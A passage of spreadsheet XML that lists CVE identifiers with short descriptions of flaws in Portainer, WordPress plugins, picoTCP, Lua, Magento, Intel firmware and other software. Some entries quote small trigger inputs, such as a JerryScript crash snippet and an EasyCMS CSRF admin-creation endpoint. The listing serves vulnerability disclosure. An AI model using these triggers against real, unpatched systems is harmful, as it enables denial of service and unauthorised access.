    <t>Portainer 1.24.1 and earlier is affected by incorrect access control that may lead to remote arbitrary code execution. The restriction checks for bind mounts are applied only on the client-side and not the server-side, which can lead to spawning a container with bind mount. Once such a container is spawned, it can be leveraged to break out of the container leading to complete Docker host machine takeover.</t>
  </si>
  <si>
    <t>CVE-2020-24265</t>
  </si>
  <si>
    <t>An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in MemcmpInterceptorCommon() that can make tcpprep crash and cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-24266</t>
  </si>
  <si>
    <t>An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in get_l2len() that can make tcpprep crash and cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-24271</t>
  </si>
  <si>
    <t>A CSRF vulnerability was discovered in EasyCMS v1.6 that can add an admin account through index.php?s=/admin/rbacuser/insert/navTabId/rbacuser/callbackType/closeCurrent, then post username=***&amp;password=***.</t>
  </si>
  <si>
    <t>CVE-2020-24285</t>
  </si>
  <si>
    <t>INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 allows an attacker to obtain sensitive information through /cgi-bin/cgiServer.exx.</t>
  </si>
  <si>
    <t>CVE-2020-24297</t>
  </si>
  <si>
    <t>httpd on TP-Link TL-WPA4220 devices (versions 2 through 4) allows remote authenticated users to execute arbitrary OS commands by sending crafted POST requests to the endpoint /admin/powerline. Fixed version: TL-WPA4220(EU)_V4_201023</t>
  </si>
  <si>
    <t>CVE-2020-24301</t>
  </si>
  <si>
    <t>Users of the HAPI FHIR Testpage Overlay 5.0.0 and below can use a specially crafted URL to exploit an XSS vulnerability in this module, allowing arbitrary JavaScript to be executed in the user's browser. The impact of this vulnerability is believed to be low, as this module is intended for testing and not believed to be widely used for any production purposes.</t>
  </si>
  <si>
    <t>CVE-2020-24303</t>
  </si>
  <si>
    <t>Grafana before 7.1.0-beta 1 allows XSS via a query alias for the ElasticSearch datasource.</t>
  </si>
  <si>
    <t>CVE-2020-24312</t>
  </si>
  <si>
    <t>mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.</t>
  </si>
  <si>
    <t>CVE-2020-24313</t>
  </si>
  <si>
    <t>Etoile Web Design Ultimate Appointment Booking &amp; Scheduling WordPress Plugin v1.1.9 and lower does not sanitize the value of the "Appointment_ID" GET parameter before echoing it back out inside an input tag. This results in a reflected XSS vulnerability that attackers can exploit with a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-24314</t>
  </si>
  <si>
    <t>Fahad Mahmood RSS Feed Widget Plugin v2.7.9 and lower does not sanitize the value of the "t" GET parameter before echoing it back out inside an input tag. This results in a reflected XSS vulnerability that attackers can exploit with a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-24315</t>
  </si>
  <si>
    <t>Vinoj Cardoza WordPress Poll Plugin v36 and lower executes SQL statement passed in via the pollid POST parameter due to a lack of user input escaping. This allows users who craft specific SQL statements to dump the entire targets database.</t>
  </si>
  <si>
    <t>CVE-2020-24316</t>
  </si>
  <si>
    <t>WP Plugin Rednumber Admin Menu v1.1 and lower does not sanitize the value of the "role" GET parameter before echoing it back out to the user. This results in a reflected XSS vulnerability that attackers can exploit with a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-24327</t>
  </si>
  <si>
    <t>Server Side Request Forgery (SSRF) vulnerability exists in Discourse 2.3.2 and 2.6 via the email function. When writing an email in an editor, you can upload pictures of remote websites.</t>
  </si>
  <si>
    <t>CVE-2020-24330</t>
  </si>
  <si>
    <t>An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges instead of by the tss user, it fails to drop the root gid privilege when no longer needed.</t>
  </si>
  <si>
    <t>CVE-2020-24331</t>
  </si>
  <si>
    <t>An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges, the tss user still has read and write access to the /etc/tcsd.conf file (which contains various settings related to this daemon).</t>
  </si>
  <si>
    <t>CVE-2020-24332</t>
  </si>
  <si>
    <t>An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges, the creation of the system.data file is prone to symlink attacks. The tss user can be used to create or corrupt existing files, which could possibly lead to a DoS attack.</t>
  </si>
  <si>
    <t>CVE-2020-24333</t>
  </si>
  <si>
    <t>A vulnerability in Arista’s CloudVision Portal (CVP) prior to 2020.2 allows users with “read-only” or greater access rights to the Configlet Management module to download files not intended for access, located on the CVP server, by accessing a specific API.</t>
  </si>
  <si>
    <t>CVE-2020-24334</t>
  </si>
  <si>
    <t>The code that processes DNS responses in uIP through 1.0, as used in Contiki and Contiki-NG, does not check whether the number of responses specified in the DNS packet header corresponds to the response data available in the DNS packet, leading to an out-of-bounds read and Denial-of-Service in resolv.c.</t>
  </si>
  <si>
    <t>CVE-2020-24335</t>
  </si>
  <si>
    <t>An issue was discovered in uIP through 1.0, as used in Contiki and Contiki-NG. Domain name parsing lacks bounds checks, allowing an attacker to corrupt memory with crafted DNS packets.</t>
  </si>
  <si>
    <t>CVE-2020-24336</t>
  </si>
  <si>
    <t>An issue was discovered in Contiki through 3.0 and Contiki-NG through 4.5. The code for parsing Type A domain name answers in ip64-dns64.c doesn't verify whether the address in the answer's length is sane. Therefore, when copying an address of an arbitrary length, a buffer overflow can occur. This bug can be exploited whenever NAT64 is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-24337</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP and picoTCP-NG through 1.7.0. When an unsupported TCP option with zero length is provided in an incoming TCP packet, it is possible to cause a Denial-of-Service by achieving an infinite loop in the code that parses TCP options, aka tcp_parse_options() in pico_tcp.c.</t>
  </si>
  <si>
    <t>CVE-2020-24338</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP through 1.7.0. The DNS domain name record decompression functionality in pico_dns_decompress_name() in pico_dns_common.c does not validate the compression pointer offset values with respect to the actual data present in a DNS response packet, causing out-of-bounds writes that lead to Denial-of-Service and Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-24339</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP and picoTCP-NG through 1.7.0. The DNS domain name record decompression functionality in pico_dns_decompress_name() in pico_dns_common.c does not validate the compression pointer offset values with respect to the actual data present in a DNS response packet, causing out-of-bounds reads that lead to Denial-of-Service.</t>
  </si>
  <si>
    <t>CVE-2020-24340</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP and picoTCP-NG through 1.7.0. The code that processes DNS responses in pico_mdns_handle_data_as_answers_generic() in pico_mdns.c does not check whether the number of answers/responses specified in a DNS packet header corresponds to the response data available in the packet, leading to an out-of-bounds read, invalid pointer dereference, and Denial-of-Service.</t>
  </si>
  <si>
    <t>CVE-2020-24341</t>
  </si>
  <si>
    <t>An issue was discovered in picoTCP and picoTCP-NG through 1.7.0. The TCP input data processing function in pico_tcp.c does not validate the length of incoming TCP packets, which leads to an out-of-bounds read when assembling received packets into a data segment, eventually causing Denial-of-Service or an information leak.</t>
  </si>
  <si>
    <t>CVE-2020-24342</t>
  </si>
  <si>
    <t>Lua through 5.4.0 allows a stack redzone cross in luaO_pushvfstring because a protection mechanism wrongly calls luaD_callnoyield twice in a row.</t>
  </si>
  <si>
    <t>CVE-2020-24343</t>
  </si>
  <si>
    <t>Artifex MuJS through 1.0.7 has a use-after-free in jsrun.c because of unconditional marking in jsgc.c.</t>
  </si>
  <si>
    <t>CVE-2020-24344</t>
  </si>
  <si>
    <t>JerryScript through 2.3.0 has a (function({a=arguments}){const arguments}) buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-24345</t>
  </si>
  <si>
    <t>** DISPUTED ** JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option.</t>
  </si>
  <si>
    <t>CVE-2020-24346</t>
  </si>
  <si>
    <t>njs through 0.4.3, used in NGINX, has a use-after-free in njs_json_parse_iterator_call in njs_json.c.</t>
  </si>
  <si>
    <t>CVE-2020-24347</t>
  </si>
  <si>
    <t>njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_lvlhsh_level_find in njs_lvlhsh.c.</t>
  </si>
  <si>
    <t>CVE-2020-24348</t>
  </si>
  <si>
    <t>njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_json_stringify_iterator in njs_json.c.</t>
  </si>
  <si>
    <t>CVE-2020-24349</t>
  </si>
  <si>
    <t>njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be "fluff" in the NGINX use case because there is no remote attack surface.</t>
  </si>
  <si>
    <t>CVE-2020-24352</t>
  </si>
  <si>
    <t>An issue was discovered in QEMU through 5.1.0. An out-of-bounds memory access was found in the ATI VGA device implementation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati_2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-24353</t>
  </si>
  <si>
    <t>Pega Platform before 8.4.0 has a XSS issue via stream rule parameters used in the request header.</t>
  </si>
  <si>
    <t>CVE-2020-24354</t>
  </si>
  <si>
    <t>Zyxel VMG5313-B30B router on firmware 5.13(ABCJ.6)b3_1127, and possibly older versions of firmware are affected by shell injection.</t>
  </si>
  <si>
    <t>CVE-2020-24355</t>
  </si>
  <si>
    <t>Zyxel VMG5313-B30B router on firmware 5.13(ABCJ.6)b3_1127, and possibly older versions of firmware are affected by insecure permissions which allows regular and other users to create new users with elevated privileges. This is done by changing "FirstIndex" field in JSON that is POST-ed during account creation. Similar may also be possible with account deletion.</t>
  </si>
  <si>
    <t>CVE-2020-24356</t>
  </si>
  <si>
    <t>`cloudflared` versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, `cloudflared` searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.</t>
  </si>
  <si>
    <t>CVE-2020-24359</t>
  </si>
  <si>
    <t>HashiCorp vault-ssh-helper up to and including version 0.1.6 incorrectly accepted Vault-issued SSH OTPs for the subnet in which a host's network interface was located, rather than the specific IP address assigned to that interface. Fixed in 0.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-24360</t>
  </si>
  <si>
    <t>An issue with ARP packets in Arista’s EOS affecting the 7800R3, 7500R3, and 7280R3 series of products may result in issues that cause a kernel crash, followed by a device reload. The affected Arista EOS versions are: 4.24.2.4F and below releases in the 4.24.x train; 4.23.4M and below releases in the 4.23.x train; 4.22.6M and below releases in the 4.22.x train.</t>
  </si>
  <si>
    <t>CVE-2020-24361</t>
  </si>
  <si>
    <t>SNMPTT before 1.4.2 allows attackers to execute shell code via EXEC, PREXEC, or unknown_trap_exec.</t>
  </si>
  <si>
    <t>CVE-2020-24363</t>
  </si>
  <si>
    <t>TP-Link TL-WA855RE V5 20200415-rel37464 devices allow an unauthenticated attacker (on the same network) to submit a TDDP_RESET POST request for a factory reset and reboot. The attacker can then obtain incorrect access control by setting a new administrative password.</t>
  </si>
  <si>
    <t>CVE-2020-24364</t>
  </si>
  <si>
    <t>MineTime through 1.8.5 allows arbitrary command execution via the notes field in a meeting. Could lead to RCE via meeting invite.</t>
  </si>
  <si>
    <t>CVE-2020-24365</t>
  </si>
  <si>
    <t>An issue was discovered on Gemtek WRTM-127ACN 01.01.02.141 and WRTM-127x9 01.01.02.127 devices. The Monitor Diagnostic network page allows an authenticated attacker to execute a command directly on the target machine. Commands are executed as the root user (uid 0). (Even if a login is required, most routers are left with default credentials.)</t>
  </si>
  <si>
    <t>CVE-2020-24366</t>
  </si>
  <si>
    <t>Sensitive information could be disclosed in the JetBrains YouTrack application before 2020.2.0 for Android via application backups.</t>
  </si>
  <si>
    <t>CVE-2020-24367</t>
  </si>
  <si>
    <t>Incorrect file permissions in BlueStacks 4 through 4.230 on Windows allow a local attacker to escalate privileges by modifying a file that is later executed by a higher-privileged user.</t>
  </si>
  <si>
    <t>CVE-2020-24368</t>
  </si>
  <si>
    <t>Icinga Icinga Web2 2.0.0 through 2.6.4, 2.7.4 and 2.8.2 has a Directory Traversal vulnerability which allows an attacker to access arbitrary files that are readable by the process running Icinga Web 2. This issue is fixed in Icinga Web 2 in v2.6.4, v2.7.4 and v2.8.2.</t>
  </si>
  <si>
    <t>CVE-2020-24369</t>
  </si>
  <si>
    <t>ldebug.c in Lua 5.4.0 attempts to access debug information via the line hook of a stripped function, leading to a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-24370</t>
  </si>
  <si>
    <t>ldebug.c in Lua 5.4.0 allows a negation overflow and segmentation fault in getlocal and setlocal, as demonstrated by getlocal(3,2^31).</t>
  </si>
  <si>
    <t>CVE-2020-24371</t>
  </si>
  <si>
    <t>lgc.c in Lua 5.4.0 mishandles the interaction between barriers and the sweep phase, leading to a memory access violation involving collectgarbage.</t>
  </si>
  <si>
    <t>CVE-2020-24372</t>
  </si>
  <si>
    <t>LuaJIT through 2.1.0-beta3 has an out-of-bounds read in lj_err_run in lj_err.c.</t>
  </si>
  <si>
    <t>CVE-2020-24373</t>
  </si>
  <si>
    <t>A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3.</t>
  </si>
  <si>
    <t>CVE-2020-24374</t>
  </si>
  <si>
    <t>A DNS rebinding vulnerability in Freebox v5 before 1.5.29.</t>
  </si>
  <si>
    <t>CVE-2020-24375</t>
  </si>
  <si>
    <t>A DNS rebinding vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3.</t>
  </si>
  <si>
    <t>CVE-2020-24376</t>
  </si>
  <si>
    <t>A DNS rebinding vulnerability in the UPnP IGD implementations in Freebox v5 before 1.5.29 and Freebox Server before 4.2.3.</t>
  </si>
  <si>
    <t>CVE-2020-24377</t>
  </si>
  <si>
    <t>A DNS rebinding vulnerability in the Freebox OS web interface in Freebox Server before 4.2.3.</t>
  </si>
  <si>
    <t>CVE-2020-24379</t>
  </si>
  <si>
    <t>WebDAV implementation in Yaws web server versions 1.81 to 2.0.7 is vulnerable to XXE injection.</t>
  </si>
  <si>
    <t>CVE-2020-24381</t>
  </si>
  <si>
    <t>GUnet Open eClass Platform (aka openeclass) before 3.11 might allow remote attackers to read students' submitted assessments because it does not ensure that the web server blocks directory listings, and the data directory is inside the web root by default.</t>
  </si>
  <si>
    <t>CVE-2020-24383</t>
  </si>
  <si>
    <t>An issue was discovered in FNET through 4.6.4. The code for processing resource records in mDNS queries doesn't check for proper '\0' termination of the resource record name string, leading to an out-of-bounds read, and potentially causing information leak or Denial-or-Service.</t>
  </si>
  <si>
    <t>CVE-2020-24384</t>
  </si>
  <si>
    <t>A10 Networks ACOS and aGalaxy management Graphical User Interfaces (GUIs) have an unauthenticated Remote Code Execution (RCE) vulnerability that could be used to compromise affected ACOS systems. ACOS versions 3.2.x (including and after 3.2.2), 4.x, and 5.1.x are affected. aGalaxy versions 3.0.x, 3.2.x, and 5.0.x are affected.</t>
  </si>
  <si>
    <t>CVE-2020-24385</t>
  </si>
  <si>
    <t>In MidnightBSD before 1.2.6 and 1.3 before August 2020, and FreeBSD before 7, a NULL pointer dereference was found in the Linux emulation layer that allows attackers to crash the running kernel. During binary interaction, td-&gt;td_emuldata in sys/compat/linux/linux_emul.h is not getting initialized and returns NULL from em_find().</t>
  </si>
  <si>
    <t>CVE-2020-24386</t>
  </si>
  <si>
    <t>An issue was discovered in Dovecot before 2.3.13. By using IMAP IDLE, an authenticated attacker can trigger unhibernation via attacker-controlled parameters, leading to access to other users' email messages (and path disclosure).</t>
  </si>
  <si>
    <t>CVE-2020-24387</t>
  </si>
  <si>
    <t>An issue was discovered in the yh_create_session() function of yubihsm-shell through 2.0.2. The function does not explicitly check the returned session id from the device. An invalid session id would lead to out-of-bounds read and write operations in the session array. This could be used by an attacker to cause a denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-24388</t>
  </si>
  <si>
    <t>An issue was discovered in the _send_secure_msg() function of yubihsm-shell through 2.0.2. The function does not validate the embedded length field of a message received from the device. This could lead to an oversized memcpy() call that will crash the running process. This could be used by an attacker to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-24390</t>
  </si>
  <si>
    <t>eonweb in EyesOfNetwork before 5.3-7 does not properly escape the username on the /module/admin_logs page, which might allow pre-authentication stored XSS during login/logout logs recording.</t>
  </si>
  <si>
    <t>CVE-2020-24391</t>
  </si>
  <si>
    <t>mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.</t>
  </si>
  <si>
    <t>CVE-2020-24392</t>
  </si>
  <si>
    <t>In voloko twitter-stream 0.1.10, missing TLS hostname validation allows an attacker to perform a man-in-the-middle attack against users of the library (because eventmachine is misused).</t>
  </si>
  <si>
    <t>CVE-2020-24393</t>
  </si>
  <si>
    <t>TweetStream 2.6.1 uses the library eventmachine in an insecure way that does not have TLS hostname validation. This allows an attacker to perform a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVE-2020-24394</t>
  </si>
  <si>
    <t>In the Linux kernel before 5.7.8, fs/nfsd/vfs.c (in the NFS server) can set incorrect permissions on new filesystem objects when the filesystem lacks ACL support, aka CID-22cf8419f131. This occurs because the current umask is not considered.</t>
  </si>
  <si>
    <t>CVE-2020-24395</t>
  </si>
  <si>
    <t>The USB firmware update script of homee Brain Cube v2 (2.28.2 and 2.28.4) devices allows an attacker with physical access to install compromised firmware. This occurs because of insufficient validation of the firmware image file and can lead to code execution on the device.</t>
  </si>
  <si>
    <t>CVE-2020-24396</t>
  </si>
  <si>
    <t>homee Brain Cube v2 (2.28.2 and 2.28.4) devices have sensitive SSH keys within downloadable and unencrypted firmware images. This allows remote attackers to use the support server as a SOCKS proxy.</t>
  </si>
  <si>
    <t>CVE-2020-24397</t>
  </si>
  <si>
    <t>An issue was discovered in the client side of Zoho ManageEngine Desktop Central 10.0.0.SP-534. An attacker-controlled server can trigger an integer overflow in InternetSendRequestEx and InternetSendRequestByBitrate that leads to a heap-based buffer overflow and Remote Code Execution with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-24400</t>
  </si>
  <si>
    <t>Magento versions 2.4.0 and 2.3.5 (and earlier) are affected by an SQL Injection vulnerability that could lead to sensitive information disclosure. This vulnerability could be exploited by an authenticated user with permissions to the product listing page to read data from the database.</t>
  </si>
  <si>
    <t>CVE-2020-24401</t>
  </si>
  <si>
    <t>Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect authorization vulnerability. A user can still access resources provisioned under their old role after an administrator removes the role or disables the user's account.</t>
  </si>
  <si>
    <t>CVE-2020-24402</t>
  </si>
  <si>
    <t>Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions vulnerability in the Integrations component. This vulnerability could be abused by authenticated users with permissions to the Resource Access API to delete customer details via the REST API without authorization.</t>
  </si>
  <si>
    <t>CVE-2020-24403</t>
  </si>
  <si>
    <t>Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect user permissions vulnerability within the Inventory component. This vulnerability could be abused by authenticated users with Inventory and Source permissions to make unauthorized changes to inventory source data via the REST API.</t>
  </si>
  <si>
    <t>CVE-2020-24404</t>
  </si>
  <si>
    <t>Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions vulnerability within the Integrations component. This vulnerability could be abused by users with permissions to the Pages resource to delete cms pages via the REST API without authorization.</t>
  </si>
  <si>
    <t>CVE-2020-24405</t>
  </si>
  <si>
    <t>Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions issue vulnerability in the Inventory module. This vulnerability could be abused by authenticated users to modify inventory stock data without authorization.</t>
  </si>
  <si>
    <t>CVE-2020-24406</t>
  </si>
  <si>
    <t>When in maintenance mode, Magento version 2.4.0 and 2.3.4 (and earlier) are affected by an information disclosure vulnerability that could expose the installation path during build deployments. This information could be helpful to attackers if they are able to identify other exploitable vulnerabilities in the environment.</t>
  </si>
  <si>
    <t>CVE-2020-24407</t>
  </si>
  <si>
    <t>Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by an unsafe file upload vulnerability that could result in arbitrary code execution. This vulnerability could be abused by authenticated users with administrative permissions to the System/Data and Transfer/Import components.</t>
  </si>
  <si>
    <t>CVE-2020-24408</t>
  </si>
  <si>
    <t>Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by a persistent XSS vulnerability that allows users to upload malicious JavaScript via the file upload component. This vulnerability could be abused by an unauthenticated attacker to execute XSS attacks against other Magento users. This vulnerability requires a victim to browse to the uploaded file.</t>
  </si>
  <si>
    <t>CVE-2020-24409</t>
  </si>
  <si>
    <t>Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.</t>
  </si>
  <si>
    <t>CVE-2020-24410</t>
  </si>
  <si>
    <t>CVE-2020-24411</t>
  </si>
  <si>
    <t>Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds write vulnerability when handling crafted PDF files. This could result in a write past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.</t>
  </si>
  <si>
    <t>CVE-2020-24412</t>
  </si>
  <si>
    <t>CVE-2020-24413</t>
  </si>
  <si>
    <t>CVE-2021-0001</t>
  </si>
  <si>
    <t>Observable timing discrepancy in Intel(R) IPP before version 2020 update 1 may allow authorized user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0002</t>
  </si>
  <si>
    <t>Improper conditions check in some Intel(R) Ethernet Controllers 800 series Linux drivers before version 1.4.11 may allow an authenticated user to potentially enable information disclosure or denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0003</t>
  </si>
  <si>
    <t>Improper conditions check in some Intel(R) Ethernet Controllers 800 series Linux drivers before version 1.4.11 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0004</t>
  </si>
  <si>
    <t>Improper buffer restrictions in the firmware of Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0005</t>
  </si>
  <si>
    <t>Uncaught exception in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0006</t>
  </si>
  <si>
    <t>Improper conditions check in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.4.0 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0007</t>
  </si>
  <si>
    <t>Uncaught exception in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.1.0 may allow a privileged attacker to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0008</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0009</t>
  </si>
  <si>
    <t>Out-of-bounds read in the firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0012</t>
  </si>
  <si>
    <t>Use after free in some Intel(R) Graphics Driver before version 27.20.100.8336, 15.45.33.5164, and 15.40.47.5166 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0013</t>
  </si>
  <si>
    <t>Improper input validation for Intel(R) EMA before version 1.5.0 may allow an unauthenticated user to potentially enable denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2021-0051</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) SPS versions before SPS_E5_04.04.04.023.0, SPS_E5_04.04.03.228.0 or SPS_SoC-A_05.00.03.098.0 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0052</t>
  </si>
  <si>
    <t>Incorrect default privileges in the Intel(R) Computing Improvement Program before version 2.4.6522 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0053</t>
  </si>
  <si>
    <t>Improper initialization in firmware for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi in Windows 10 may allow an authenticated user to potentially enable information disclosure via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0054</t>
  </si>
  <si>
    <t>Improper buffer restrictions in system firmware for some Intel(R) NUCs may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0055</t>
  </si>
  <si>
    <t>Insecure inherited permissions for some Intel(R) NUC 9 Extreme Laptop Kit LAN Drivers before version 10.42 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0056</t>
  </si>
  <si>
    <t>Insecure inherited permissions for the Intel(R) NUC M15 Laptop Kit Driver Pack software before updated version 1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0057</t>
  </si>
  <si>
    <t>Uncontrolled search path in the Intel(R) NUC M15 Laptop Kit Driver Pack software before updated version 1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0058</t>
  </si>
  <si>
    <t>Incorrect default permissions in the Intel(R) NUC M15 Laptop Kit Driver Pack software before updated version 1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0060</t>
  </si>
  <si>
    <t>Insufficient compartmentalization in HECI subsystem for the Intel(R) SPS before versions SPS_E5_04.01.04.516.0, SPS_E5_04.04.04.033.0, SPS_E5_04.04.03.281.0, SPS_E5_03.01.03.116.0, SPS_E3_05.01.04.309.0, SPS_02.04.00.101.0, SPS_SoC-A_05.00.03.114.0, SPS_SoC-X_04.00.04.326.0, SPS_SoC-X_03.00.03.117.0, IGN_E5_91.00.00.167.0, SPS_PHI_03.01.03.078.0 may allow an authenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-0061</t>
  </si>
  <si>
    <t>Improper initialization in some Intel(R) Graphics Driver before version 27.20.100.9030 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0062</t>
  </si>
  <si>
    <t>Improper input validation in some Intel(R) Graphics Drivers before version 27.20.100.8935 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0063</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi in Windows 10 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0064</t>
  </si>
  <si>
    <t>Insecure inherited permissions in the Intel(R) PROSet/Wireless WiFi software installer for Windows 10 before version 22.40 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0065</t>
  </si>
  <si>
    <t>Incorrect default permissions in the Intel(R) PROSet/Wireless WiFi software installer for Windows 10 before version 22.40 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0066</t>
  </si>
  <si>
    <t>Improper input validation in firmware for Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and Killer(TM) Wi-Fi in Windows 10 and 11 may allow an unauthenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0067</t>
  </si>
  <si>
    <t>&amp;nbsp;Improper access control in system firmware for some Intel(R) NUCs may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0069</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless WiFi in multiple operating systems and some Killer(TM) WiFi in Windows 10 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0070</t>
  </si>
  <si>
    <t>Improper input validation in the BMC firmware for Intel(R) Server Board M10JNP2SB before version EFI BIOS 7215, BMC 8100.01.08 may allow an unauthenticated user to potentially enable an escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0071</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless WiFi in UEFI may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-0072</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) PROSet/Wireless Wi-Fi in multiple operating systems and some Killer(TM) Wi-Fi in Windows 10 and 11 may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0073</t>
  </si>
  <si>
    <t>Insufficient control flow management in Intel(R) DSA before version 20.11.50.9 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0074</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Computing Improvement Program software before version 2.4.5982 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-0075</t>
  </si>
  <si>
